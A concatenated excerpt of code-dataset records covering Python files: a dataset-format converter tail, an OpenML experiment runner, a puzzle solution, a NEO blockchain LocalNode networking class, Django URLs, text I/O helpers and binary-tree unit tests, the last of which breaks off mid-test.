args.task == 'vector_annotation':\n c_strategy = DataLoopObjectDetectionStrategy(args)\n elif args.dataset_format == \"Supervisely\":\n if args.task == 'vector_annotation' or args.task == 'instance_segmentation' or args.task == 'object_detection' or args.task == 'keypoint_detection':\n c_strategy = SuperviselyObjectDetectionStrategy(args)\n elif args.dataset_format == \"VoTT\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = VoTTObjectDetectionStrategy(args)\n elif args.dataset_format == \"SageMaker\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation':\n c_strategy = SageMakerObjectDetectionStrategy(args)\n elif args.dataset_format == \"VGG\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = VGGObjectDetectionStrategy(args)\n elif args.dataset_format == \"GoogleCloud\":\n if args.task == 'object_detection':\n c_strategy = GoogleCloudObjectDetectionStrategy(args)\n elif args.dataset_format == \"YOLO\":\n if args.task == 'object_detection':\n c_strategy = YoloObjectDetectionStrategy(args)\n else:\n pass\n\n self.__set_strategy(c_strategy)\n","sub_path":"superannotate/input_converters/converters/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"267153759","text":"import os, argparse\nimport shutil\n\nopen_ml_problems_folder = 'OpenML_datasets'\nsurrogate_data_path = 'data/surrogate/data/'\n\n# fixed test params as first part\nk_params = [30, 50, 100] # 100, 150, 200\nk_random = [0] # 0, 1\nk_reinit = [0] # 0, 1\nevery_ls = 5\n\nn_times = 5\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Find best features for each OpenML problems\")\n\n parser.add_argument('--ils', type=int, help='number of total iteration for ils algorithm', required=True)\n parser.add_argument('--ls', type=int, help='number of iteration for Local Search algorithm', required=True)\n\n args = parser.parse_args()\n\n p_ils = args.ils\n p_ls = args.ls\n\n open_ml_problems = sorted(os.listdir(open_ml_problems_folder))\n\n for ml_problem in open_ml_problems:\n\n # for each problem prepare specific pre-computed real solution file\n ml_problem_name = ml_problem.replace('.csv', '')\n ml_problem_path = os.path.join(open_ml_problems_folder, ml_problem)\n\n # ml_surrogate_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n # f\"--data {ml_problem_path} \" \\\n # f\"--ils {p_ils} \" \\\n # f\"--ls {p_ls} \" \\\n # f\"--output {ml_problem_name} \" \\\n # f\"--generate_only 1\"\n # print(f'Running extraction real evaluations data for {ml_problem_name}')\n # os.system(ml_surrogate_command)\n\n # real_evaluation_data_file_path = os.path.join(surrogate_data_path, ml_problem_name)\n\n # for each multi param:\n # - copy precomputed real_evaluation_data_file\n # - run new instance using specific data\n for k in k_params:\n for k_r in k_random:\n for k_init in k_reinit:\n\n # if not use of k_reinit and use of random, then run multiple times this instance to do mean later\n if k_init == 0 and k_r == 1:\n for i in range(n_times):\n\n str_index = str(i)\n\n while len(str_index) < 3:\n str_index = \"0\" + str_index\n\n output_problem_name = f'{ml_problem_name}_everyLS_{every_ls}_k{k}_random{k_r}_reinit{k_init}_{str_index}'\n\n # copy pre-computed real evaluation data for this instance\n # current_output_real_eval_path = os.path.join(surrogate_data_path, output_problem_name)\n # shutil.copy2(real_evaluation_data_file_path, current_output_real_eval_path)\n\n ml_surrogate_multi_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n f\"--data {ml_problem_path} \" \\\n f\"--ils {p_ils} \" \\\n f\"--ls {p_ls} \" \\\n f\"--every_ls {every_ls} \" \\\n f\"--k_division {k} \" \\\n f\"--k_random {k_r} \" \\\n f\"--k_dynamic {k_init} \" \\\n f\"--output {output_problem_name}\"\n \n print(f'Running extraction data for {ml_problem_name} with [ils: {p_ils}, ls: {p_ls}, k: {k}, k_r: {k_r}, i: {i}]')\n os.system(ml_surrogate_multi_command)\n\n else:\n output_problem_name = f'{ml_problem_name}_everyLS_{every_ls}_k{k}_random{k_r}_reinit{k_init}'\n\n # copy pre-computed real evaluation data for this instance\n # current_output_real_eval_path = os.path.join(surrogate_data_path, output_problem_name)\n # shutil.copy2(real_evaluation_data_file_path, current_output_real_eval_path)\n\n ml_surrogate_multi_command = f\"python find_best_attributes_surrogate_openML_multi_specific.py \" \\\n f\"--data {ml_problem_path} \" \\\n f\"--ils {p_ils} \" \\\n f\"--ls {p_ls} \" \\\n f\"--every_ls {every_ls} \" \\\n f\"--k_division {k} \" \\\n f\"--k_random {k_r} \" \\\n f\"--k_dynamic {k_init} \" \\\n f\"--output {output_problem_name}\"\n \n print(f'Running extraction data for {ml_problem_name} with [ils: {p_ils}, ls: {p_ls}, k: {k}, k_r: {k_r}]')\n os.system(ml_surrogate_multi_command)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"run_openML_surrogate_multi_specific.py","file_name":"run_openML_surrogate_multi_specific.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444611016","text":"# test input\n#inp = [65, 8921]\n\n# real input\ninp = [591, 393]\n\nclass Generator:\n\tDIV = 2147483647\n\tdef __init__(self, initial, factor):\n\t\tself.current = initial\n\t\tself.factor = factor\n\n\tdef cycle(self):\n\t\t\"\"\" Passes the generator through a cycle:\n\t\t\tMultiply the current value for the factor\n\t\t\tDivide by DIV\n\t\t\tSet the current value to be the remainder\n\t\t\"\"\"\n\t\tself.current = (self.current * self.factor) % self.DIV\n\t\treturn self.current\n\n\tdef bin(self):\n\t\t\"\"\" Returns the last 16 digits of the binary representation of the current value\n\t\t\"\"\"\n\t\treturn bin(self.current)[-16:]\n\n\tdef getCurrent(self):\n\t\t\"\"\" Returns the current value in decimal form\n\t\t\"\"\"\n\t\treturn self.current\n\n\ndef main(ipt):\n\tscore = 0\n\tgena, genb = Generator(ipt[0], 16807), Generator(ipt[1], 48271)\n\tfor i in range(5000000):\n\t\tprint(\"\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b\\b{} score: {}\".format(i, score), end=\"\")\n\t\taval, bval = gena.cycle(), genb.cycle()\n\t\twhile (aval % 4 != 0):\n\t\t\taval = gena.cycle()\n\t\twhile (bval % 8 != 0):\n\t\t\tbval = genb.cycle()\n\t\tabin, bbin = gena.bin(), genb.bin()\n\t\t#print(\"{}\\t\\t{}\".format(aval, abin))\n\t\t#print(\"{}\\t\\t{}\".format(bval, bbin))\n\t\tif abin == bbin:\n\t\t\tscore += 1\n\tprint(\"\\nScore: \", score)\n\n\nif __name__ == \"__main__\":\n\tmain(inp)","sub_path":"puzzle15-2.py","file_name":"puzzle15-2.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"447461776","text":"from neo import Settings\nfrom neo.Network.TCPRemoteNode import TCPRemoteNode\nfrom neo.Network.IPEndpoint import IPEndpoint\nfrom neo.Core.Blockchain import Blockchain\nfrom neo.Core.Block import Block\nfrom neo.Core.TX.MinerTransaction import MinerTransaction\nfrom neo.Core.TX.Transaction import Transaction,TransactionType\nfrom events import Events\nimport asyncio\nfrom gevent import monkey\nfrom concurrent.futures import ThreadPoolExecutor\nmonkey.patch_all()\nimport random\nimport threading\nfrom autologging import logged\n\n#outside class def so it can be static\n_mempool = {} # contains { uint256, transaction }\n\n@logged\nclass LocalNode():\n\n PROTOCOL_VERSION = 0\n CONNECTED_MAX = 10\n UNCONNECTED_MAX = 1000\n MEMORY_POOL_SIZE = 30000\n\n\n\n __LOOP = None\n\n InventoryReceiving = Events()\n InventoryReceived = Events()\n\n# new_tx_event = threading.Event()\n\n _temppool = set() # contains transactions\n _hash_set = set() # contains transactions\n _known_hashes = [] # contains transaction hashes (uint256)\n\n _cache = None\n\n _unconnected_peers = set() #ip enpoints\n _bad_peers = set() #ip endpoints\n _connected_peers = [] #remote nodes\n\n _local_addresses = set() #ip addresses\n _port = 0\n _localhost = '127.0.0.1'\n\n _nonce = random.randint(1294967200,4294967200)\n\n _listener = None\n\n _server_thread = None\n _connect_thread = None\n _pool_thread = None\n\n _server_socket = None\n _server = None\n\n _started = 0\n _disposed = 0\n\n GlobalMissionsEnabled = True\n ServiceEnabled = True\n UnPnpEnabled = False\n UserAgent = \"/NEO:2.0.1/\"\n\n def __init__(self):\n\n# self._make_server()\n\n self._port = Settings.NODE_PORT\n self._make_loops()\n #not sure exactly how this works at the moment\n Blockchain.PersistCompleted.on_change += self.Blockchain_persistCompleted\n\n\n\n def AcceptPeersAsync(self):\n\n while self._disposed == 0:\n\n sock = None\n\n try:\n\n sock, addr = self._listener.AcceptSocketAsync()\n\n remoteNode = TCPRemoteNode(self, addr)\n\n except Exception as e:\n self.__log.debug(\"couldnt get socket %s \" % e)\n pass\n\n def AddTransaction(self, tx):\n if Blockchain.Default() is None: return False\n\n #lock mempool\n\n if tx.Hash() in _mempool:\n return False\n elif Blockchain.Default().ContainsTransaction(tx.Hash()):\n return False\n elif not tx.Verify([v for k,v in _mempool]): return False\n\n _mempool[tx.Hash()] = tx\n # endlock\n\n self.CheckMemPool()\n\n return True\n\n\n def _make_loops(self):\n\n\n self.__LOOP = asyncio.new_event_loop()\n asyncio.set_event_loop(self.__LOOP)\n asyncio.run_coroutine_threadsafe(self.ConnectToPeersLoop(), self.__LOOP)\n\n asyncio.run_coroutine_threadsafe(self.AddTransactionLoop(), self.__LOOP)\n self.__LOOP.run_forever()\n\n\n\n def _close(self):\n self._server.shutdown()\n self._server.server_close()\n\n def LocalAddresses(self):\n return set()\n\n def ConnectedPeers(self):\n return []\n\n def RemoteNodeCount(self):\n return len(self._connected_peers)\n\n\n async def AddTransactionLoop(self):\n# self.new_tx_event.wait()\n\n self.__log.debug(\"Running add transaction loop\")\n while self._disposed == 0:\n transactions = []\n\n #lock temppool\n #if len(self._temppool == 0): continue\n transactions = list(self._temppool)\n self._temppool = []\n #endlock\n\n verified = set()\n #lock mempool\n\n transactions = [tx for tx in transactions if not tx.Hash() in _mempool and not Blockchain.Default().ContainsTransaction(tx.Hash())]\n\n if len(transactions):\n mempool_current = [v for k,v in _mempool]\n for tx in transactions:\n if tx.Verify( mempool_current + transactions):\n verified.add(tx)\n for tx in verified:\n _mempool[tx.Hash()] = tx\n\n self.CheckMemPool()\n #endlock\n\n await self.RelayDirectly(verified)\n\n if self.InventoryReceived is not None:\n [self.InventoryReceived.on_change(tx) for tx in verified]\n\n\n @staticmethod\n def AllowHashes(hashes):\n #lock known hashes\n LocalNode._known_hashes = LocalNode._known_hashes - hashes\n #endlock\n\n\n def KnownHashes(self):\n return self._known_hashes\n\n def Blockchain_persistCompleted(self, block):\n #lock mempool\n for tx in block.Transactions:\n del _mempool[tx.Hash()]\n\n if len(_mempool) == 0: return\n\n remaining = [v for k,v in _mempool]\n _mempool = {}\n\n #lock temp ppol\n self._temppool = self._temppool + remaining\n #end lock temppool\n\n# self.new_tx_event.set()\n #endlock mempool\n\n\n def CheckMemPool(self):\n\n if len(_mempool) <= self.MEMORY_POOL_SIZE: return\n num_to_delete = len(_mempool) - self.MEMORY_POOL_SIZE\n hashes_to_delete = [k for k,v in _mempool][:-num_to_delete]\n for hash in hashes_to_delete:\n del _mempool[hash]\n\n\n\n# async def ConnectToPeersAsync(self, address, port):\n\n\n async def ConnectToPeersAsync(self, remoteEndpoint):\n\n if remoteEndpoint.Port == self._port and remoteEndpoint.Address in self.LocalAddresses():\n return\n\n #lock unconnected peers\n try:\n self._unconnected_peers.remove(remoteEndpoint)\n except Exception as e:\n self.__log.debug(\"Could not remove endpoint from unconnected peers\")\n #endlock\n\n #lock connected peers\n for cp in self._connected_peers:\n if cp.ListenerEndpoint.Address == remoteEndpoint.Address and cp.ListenerEndpoint.Port == remoteEndpoint.ListenerEndpoint.Port:\n return\n #endlock\n\n remote_node = TCPRemoteNode(self, remoteEndpoint)\n\n result = remote_node.ConnectAsync()\n if result:\n await self.OnConnected(remote_node)\n\n\n @asyncio.coroutine\n def ConnectToPeersLoop(self):\n\n while self._disposed == 0:\n\n connectedCount = len(self._connected_peers)\n unconnectedCount = len(self._unconnected_peers)\n self.__log.debug(\"connect loop: unconnected, connected %s %s \" % (connectedCount, unconnectedCount))\n if connectedCount < self.CONNECTED_MAX:\n\n taskloop = asyncio.get_event_loop()\n tasks = []\n\n if unconnectedCount > 0:\n endpoints = []\n\n #lock unconnected peers\n num_to_take = self.CONNECTED_MAX - connectedCount\n endpoints = list(self._unconnected_peers)[:num_to_take]\n #endlock\n\n for ep in endpoints:\n tasks.append( taskloop.create_task( self.ConnectToPeersAsync(ep)))\n\n elif connectedCount > 0:\n\n #lock connected peers\n [node.RequestPeers() for node in self._connected_peers]\n #endlock\n\n else:\n seeds = [IPEndpoint(str.split(':')[0], int(str.split(':')[1])) for str in Settings.SEED_LIST]\n# seeds = [IPEndpoint('seed1.neo.org',20333),]\n\n for ep in seeds:\n tasks.append(taskloop.create_task(self.ConnectToPeersAsync(ep)))\n\n wait_tasks = asyncio.wait(tasks)\n taskloop.run_until_complete(wait_tasks)\n taskloop.close()\n\n i = 0\n\n while i < 50 and self._disposed == 0:\n i = i+1\n asyncio.sleep(1)\n\n\n @staticmethod\n def ContainsTransaction(self):\n #lock mempool\n return hash in _mempool\n #endlock\n\n\n def Dispose(self):\n if self._disposed == 0:\n\n if self._started > 0:\n\n Blockchain.PersistCompleted -= self.Blockchain_persistCompleted\n\n if self._listener is not None: self._listener.Dispose()\n\n if self._connect_thread.is_alive(): self._connect_thread.join()\n\n #lock unconnected peers\n\n if self._unconnected_peers < self.UNCONNECTED_MAX:\n #lock connected peers\n self._unconnected_peers = self._unconnected_peers + [peer for peer in self._connected_peers if peer.ListenerEnpoint is not None][:self.UNCONNECTED_MAX - len(self._unconnected_peers)]\n #endlock\n\n nodes = []\n\n #lock connected peers\n nodes = list(self._connected_peers)\n #endlock\n\n #this shouldbe done async, i guess\n [node.Disconnect(False) for node in nodes]\n\n #self.new_tx_event.set()\n\n if self._pool_thread.is_alive(): self._pool_thread.join()\n\n #self.new_tx_event.clear()\n\n\n @staticmethod\n def GetMemoryPool():\n #lock mempool\n return [v for k,v in _mempool]\n #endlock\n\n def GetRemoteNodes(self):\n #lock connected peers\n return list(self._connected_peers)\n #endlock\n\n @staticmethod\n def GetTransaction(hash):\n\n #lock mempool\n if _mempool[hash] is not None:\n return _mempool[hash]\n #endlock\n return None\n\n @staticmethod\n def IsIntranetAddress( address ):\n raise NotImplementedError()\n\n @staticmethod\n def LoadState(stream):\n raise NotImplementedError()\n\n async def OnConnected(self, remoteNode):\n\n #lock connected peres\n length = len(self._connected_peers)\n self._connected_peers.append(remoteNode)\n remoteNode.ServerID = length\n #endlock\n# self.__log.debug(\"connected peers: %s \" % [p.ToString() for p in self._connected_peers])\n remoteNode.Disconnected.on_change += self.RemoteNode_Disconnected\n remoteNode.InventoryReceived.on_change += self.RemoteNode_InventoryReceived\n remoteNode.PeersReceived.on_change += self.RemoteNode_PeersReceived\n node_name = 'RemoteNode-%s-thread ' % remoteNode.RemoteEndpoint.Address\n loop = asyncio.get_event_loop()\n await loop.create_task(remoteNode.StartProcol())\n# thread = threading.Thread(target=remoteNode.StartProcol,name=node_name, daemon=True)\n# thread.start()\n# await remoteNode.StartProcol()\n\n\n async def ProcessWebsocketAsync(self, context):\n raise NotImplementedError()\n\n def Relay(self, inventory):\n\n\n if inventory is MinerTransaction: return False\n\n #lock known hashes\n if inventory.Hash() in self._known_hashes: return False\n #endlock\n\n self.InventoryReceiving.on_change(self, inventory)\n\n if type(inventory) is Block:\n if Blockchain.Default() == None: return False\n\n if Blockchain.Default().ContainsBlock(inventory.HashToByteString()):\n self.__log.debug(\"cant add block %s because blockchain already contains it \" % inventory.HashToByteString())\n return False\n self.__log.debug(\"Will Try to add block\" % inventory.HashToByteString())\n\n if not Blockchain.Default().AddBlock(inventory): return False\n\n elif type(inventory) is Transaction or issubclass(type(inventory), Transaction):\n if not self.AddTransaction(inventory): return False\n\n else:\n if not inventory.Verify(): return False\n\n\n relayed = self.RelayDirectly(inventory)\n\n self.InventoryReceived.on_change(inventory)\n\n return relayed\n\n def RelayDirectly(self, inventory):\n\n relayed = False\n #lock connected peers\n\n #RelayCache.add(inventory)\n\n# for node in self._connected_peers:\n# self.__log.debug(\"Relaying to remote node %s \" % node)\n# relayed |= node.Relay(inventory)\n\n #end lock\n return relayed\n\n def RemoteNode_Disconnected(self, sender, error):\n remoteNode = sender\n remoteNode.Disconnected.on_change -= self.RemoteNode_Disconnected\n remoteNode.InventoryReceived.on_change -= self.RemoteNode_InventoryReceived\n remoteNode.PeersReceived.on_change -= self.RemoteNode_PeersReceived\n\n if error and remoteNode.ListenerEndpoint is not None:\n #lock bad peers\n self._bad_peers.add(remoteNode.ListenerEndpoint)\n #endlock\n\n #lock unconnected peers\n #lock connected peers\n if remoteNode.ListenerEndpoint is not None:\n self._unconnected_peers.remove(remoteNode.ListenerEndpoint)\n\n self._connected_peers.remove(remoteNode)\n #endlock\n #endlock\n\n def RemoteNode_InventoryReceived(self, sender, inventory):\n\n self.__log.debug(\"Remote Node inventory received %s \" % inventory)\n\n if inventory is Transaction and inventory.Type is not TransactionType.ClaimTransaction and inventory.Type is not TransactionType.IssueTransaction:\n\n if Blockchain.Default() is None: return\n\n #lock known hashes\n if inventory.Hash in self._known_hashes: return\n self._known_hashes.append(inventory.Hash)\n # endlock\n\n self.InventoryReceiving.on_change(self, inventory)\n\n #lock temppool\n self._temppool.add(inventory)\n #endlock\n #self.new_tx_event.set()\n\n else:\n self.Relay(inventory)\n\n def RemoteNode_PeersReceived(self, sender, peers):\n\n #lock unconnected peers\n\n\n if len(self._unconnected_peers) < self.UNCONNECTED_MAX:\n\n #lock bad peers\n #lock connected peers\n\n self._unconnected_peers = self._unconnected_peers + peers\n self._unconnected_peers -= self._bad_peers\n self._unconnected_peers -= set([p.ListenerEndpoint for p in self._connected_peers])\n #endlock connected peers\n #endlock bad peers\n\n\n #endlock unconnected peers\n\n\n @staticmethod\n def SaveState( stream ):\n raise NotImplementedError()\n\n async def _startTask(self, port, ws_port):\n\n self.__log.debug(\"__start_task\")\n\n if port > 0:\n endpoint = IPEndpoint(IPEndpoint.ANY,port)\n try:\n self._listener = TCPRemoteNode(self, endpoint)\n self._listener.daemon_threads = True\n except Exception as e:\n self.__log.debug(\"coludnt start remote node: %s \" % e)\n\n try:\n self._port = port\n\n executor = ThreadPoolExecutor()\n await self.__LOOP.run_in_executor(executor, self.AcceptPeersAsync())\n except Exception as e:\n self.__log.debug(\"ecxpetion creating listener: %s \" % e)\n\n if ws_port > 0:\n # create websocket host\n pass\n\n\n\n def Start(self, port=0, ws_port=0):\n if self._started == 0:\n\n\n asyncio.run_coroutine_threadsafe(self._startTask(port, ws_port), self.__LOOP)\n# asyncio.ensure_future(self._startTask(port, ws_port))\n# self.__LOOP.run_until_complete(future)\n yield self.__LOOP.run_forever()\n\n\n def SyncronizeMemoryPool(self):\n #lock connected peers\n\n for node in self._connected_peers:\n node.RequestMemoryPool()\n","sub_path":"neo/Network/LocalNode.py","file_name":"LocalNode.py","file_ext":"py","file_size_in_byte":15609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"568577335","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^client/$',views.index,name='index'),\n\t#url(r'^client/(?P[0-9]+)/$',views.client,name='client'),\n\t\n\turl(r'^client/(?P[0-9]+)/$',views.detail,name='detail'),\n\turl(r'^client/addclient/$',views.addclient,name='addclient'),\n\turl(r'^client/(?P[0-9]+)/addproject/$',views.addproject,name='addproject'),\n\turl(r'^client/(?P[0-9]+)/projectdetails/(?P[0-9]+)/$',views.projectdetails,name='projectdetails'),\n\turl(r'^client/(?P[0-9]+)/project/(?P[0-9]+)/report/$',views.report,name='report'),\n\t]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"270888698","text":"# Exercício 015\r\n\r\n# Escreva um programa que pergunte a quantidade de KM percorridos por um carro alugado\r\n# e a quantidade de dias pelos quais ele foi alugado. Calcule o preço a pagar, sabendo\r\n# que o carro custa R$60,00 por dia e R$ 0,15 por KM rodado.\r\n\r\ndias = float(input('Quantos dias o carro está alugado? '))\r\nkm = float(input('Quantos kilometros foram rodados? '))\r\n\r\ndiap = dias*60\r\nkmp = km*0.15\r\n\r\nprint('O preço total é {:.2f}.\\nVocê está pagando {:.2f} por dias alugados.\\nVocê está pagando {:.2f} por Km rodado.'.format(diap + kmp, diap, kmp))\r\n","sub_path":"Mundo 1 - Fundamentos/ex015.py","file_name":"ex015.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"642868690","text":"\nimport csv\nimport re\nfrom utils.io.common import create_directories_for_file_name\n\n\ndef load_dict_csv(file_name, value_type=str):\n \"\"\"\n Loads a .csv file as a dict, where the first column indicate the key string\n and the following columns are the corresponding value or list of values.\n :param file_name: The file name to load.\n :param value_type: Each value will be converted to this type.\n :return: A dictionary of every entry of the .csv file.\n \"\"\"\n d = {}\n with open(file_name, 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n id = row[0]\n value = list(map(value_type, row[1:]))\n if len(value) == 1:\n value = value[0]\n d[id] = value\n return d\n\n\ndef load_dict_idl(file_name, dim, value_type=str):\n \"\"\"\n Loads a .idl file as a dict. Returns a list of lists, while dim represents the dimension of the inner list.\n :param file_name: The file name to load.\n :param dim: The dimension of the inner list.\n :param value_type: Each value will be converted to this type.\n :return: A dictionary of every entry of the .idl file.\n \"\"\"\n numeric_const_pattern = r'[-+]?[0-9]*\\.?[0-9]+(?:[eE][-+]?[0-9]+)?'\n d = {}\n with open(file_name, 'r') as file:\n for line in file.readlines():\n id_match = re.search('\"(.*)\"', line)\n id = id_match.groups()[0]\n match_string = '\\(' + ','.join(['(' + numeric_const_pattern + ')'] * dim) + '\\)'\n coords_matches = re.findall(match_string, line)\n values = []\n for coords_match in coords_matches:\n values.append([value_type(coords_match[i]) for i in range(dim)])\n d[id] = values\n return d\n\n\ndef load_list(file_name):\n \"\"\"\n Loads a .txt file as a list, where every line is a list entry.\n :param file_name: The file name to load.\n :return: A list of every line of the .txt file.\n \"\"\"\n with open(file_name, 'r') as file:\n return [line.strip('\\n') for line in file.readlines()]\n\n\ndef load_list_csv(file_name):\n \"\"\"\n Loads a .csv file as a list of lists, where every line is a list entry.\n :param file_name: The file name to load.\n :return: A list of lists of every value of every line of the .csv file.\n \"\"\"\n with open(file_name, 'r') as file:\n reader = csv.reader(file)\n return [row for row in reader]\n\n\ndef save_dict_csv(d, file_name, header=None):\n \"\"\"\n Saves a dictionary as a .csv file. The key is written as the first column. If the value is a list or a tuple,\n each entry is written as a consecutive column. Otherwise, the value is written as the second column\n :param d: The dictionary do write\n :param file_name: The file name.\n :param header: If given, this list will be written as a header.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n writer = csv.writer(file)\n if header is not None:\n writer.writerow(header)\n for key, value in sorted(d.items()):\n if isinstance(value, list):\n writer.writerow([key] + value)\n elif isinstance(value, tuple):\n writer.writerow([key] + list(value))\n else:\n writer.writerow([key, value])\n\n\ndef save_string_txt(string, file_name):\n \"\"\"\n Saves a string as a text file.\n :param string: The string to write.\n :param file_name: The file name.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n file.write(string)\n\n\ndef save_list_txt(string_list, file_name):\n \"\"\"\n Saves string list as a text file. Each list entry is a new line.\n :param string_list: The string list to write.\n :param file_name: The file name.\n \"\"\"\n create_directories_for_file_name(file_name)\n with open(file_name, 'w') as file:\n string_list_with_endl = [string + '\\n' for string in string_list]\n file.writelines(string_list_with_endl)\n","sub_path":"utils/io/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173849986","text":"import sys\n\nfor line in open(sys.argv[1]):\n\tnum, count, coin = int(line.rstrip()), 0, 5\n\twhile True:\n\t\tif num - coin >= 0: \n\t\t\tnum -= coin\n\t\t\tcount += 1\n\t\telse: \n\t\t\tcoin -= 2\n\t\tif coin < 0: break\n\tprint(count)\n","sub_path":"moderate/python/28_minimum_coins.py3","file_name":"28_minimum_coins.py3","file_ext":"py3","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"562389634","text":"\"\"\"\nTest for BinaryTree class\n\"\"\"\n\nimport unittest\n\nfrom binarytree.node import Node\nfrom binarytree.binarytree import BinaryTree\n\n\nclass BinaryTreeTestCase(unittest.TestCase):\n \"\"\"\n This Case of tests checks the functionality of the implementation of Binary Tree\n \"\"\"\n\n def test_add_nodes_from_list(self):\n \"\"\"\n (positive testing of add function)\n Create a binary tree.\n Add nodes from list to the binary tree.\n Test that all the nodes are placed correctly\n \"\"\"\n binary_tree = BinaryTree(4)\n nodes = [Node(3), Node(1), Node(2), Node(6), Node(7), Node(5)]\n for node in nodes:\n binary_tree.add(node)\n self.assertEqual(binary_tree.root.value, 4)\n self.assertEqual(binary_tree.root.left.value, 3)\n self.assertEqual(binary_tree.root.right.value, 6)\n\n def test_call_add_non_integers_raised_error(self):\n \"\"\"\n (negative testing of add function)\n Create a binary tree.\n Test that call of add method with incorrect input values raises Value error\n \"\"\"\n binary_tree = BinaryTree(4)\n not_nodes = [4, 10.44465, 'two', None, {}, ['wow']]\n for val in not_nodes:\n self.assertRaises(ValueError, binary_tree.add, val)\n\n def test_add_to_empty_binary_tree(self):\n \"\"\"\n (end-to-end testing of add function)\n Create an empty binary tree.\n Add nodes from a values generator to the binary tree.\n Test that all the nodes are placed correctly\n \"\"\"\n binary_tree = BinaryTree()\n for val in range(1, 5):\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.root.value, 1)\n self.assertEqual(binary_tree.root.right.value, 2)\n self.assertEqual(binary_tree.root.right.right.value, 3)\n self.assertEqual(binary_tree.root.right.right.right.value, 4)\n\n def test_find_existing_nodes(self):\n \"\"\"\n (positive testing of find function)\n Create an empty binary tree.\n Add nodes from list to the binary tree.\n Test that the nodes of the binary tree can be found\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n for val in node_values:\n self.assertEqual(binary_tree.find(Node(val)).value, Node(val).value)\n\n def test_call_find_incorrect_values(self):\n \"\"\"\n (negative testing of find function)\n Create an empty binary tree.\n Add nodes from list to the binary tree.\n Test that call of find with incorrect values returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n wrong_values = [Node(0), Node(1), 10, 2, 13, 100, 548150, 10.44465, 'two', None, {}]\n for val in wrong_values:\n self.assertEqual(binary_tree.find(val), None)\n\n def test_find_odd_numbers_in_even_number_binary_tree(self):\n \"\"\"\n (end-to-end testing of find function)\n Create an empty binary tree.\n Add nodes with even numbers from generator to the binary tree.\n Test that call of find with odd numbers from generator returns None\n \"\"\"\n binary_tree = BinaryTree()\n for val in range(10, 0, -1):\n if not val % 2:\n binary_tree.add(Node(val))\n for val in range(10, 0, -2):\n self.assertEqual(binary_tree.find(Node(val)).value, Node(val).value)\n for val in range(10, 0, -1):\n if val % 2:\n self.assertEqual(binary_tree.find(Node(val)), None)\n\n def test_remove_existing_nodes(self):\n \"\"\"\n (positive testing of remove function)\n Create a binary tree by adding nodes from list.\n Remove nodes using the values from the list.\n Test that the nodes of the binary tree are removed correctly\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n while node_values:\n self.assertEqual(binary_tree.remove(Node(node_values[-1])).value, node_values[-1])\n node_values.pop()\n self.assertEqual(binary_tree.root.value, None)\n\n def test_call_remove_incorrect_values(self):\n \"\"\"\n (negative testing of remove function)\n Create an empty binary tree.\n Add nodes from list of values to the binary tree.\n Test that call of remove with incorrect values returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n wrong_values = [Node(0), Node(100), 10, 5, 100, 548150, 10.44465, None, 'two', {}]\n for val in wrong_values:\n self.assertEqual(binary_tree.remove(val), None)\n\n def test_call_remove_already_removed_nodes(self):\n \"\"\"\n (end-to-end testing of remove function)\n Create an empty binary tree.\n Add nodes from list of values to the binary tree and remove them.\n Test that call of remove with already removed nodes returns None\n \"\"\"\n binary_tree = BinaryTree()\n node_values = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values:\n binary_tree.add(Node(val))\n self.assertEqual(binary_tree.remove(Node(node_values[0])).value, node_values[0])\n while node_values:\n self.assertEqual(binary_tree.remove(Node(node_values[-1])), None)\n node_values.pop()\n\n def test_get_height_of_binary_trees(self):\n \"\"\"\n (positive testing of get_height function)\n Create binary trees with different number and sequence of nodes.\n Test that their height is calculated correctly\n \"\"\"\n binary_tree_1 = BinaryTree(5)\n self.assertEqual(binary_tree_1.get_height(), 0)\n\n binary_tree_2 = BinaryTree()\n node_values_2 = [10, 5, 15, 2, 12, 6, 20, 19]\n for val in node_values_2:\n binary_tree_2.add(Node(val))\n 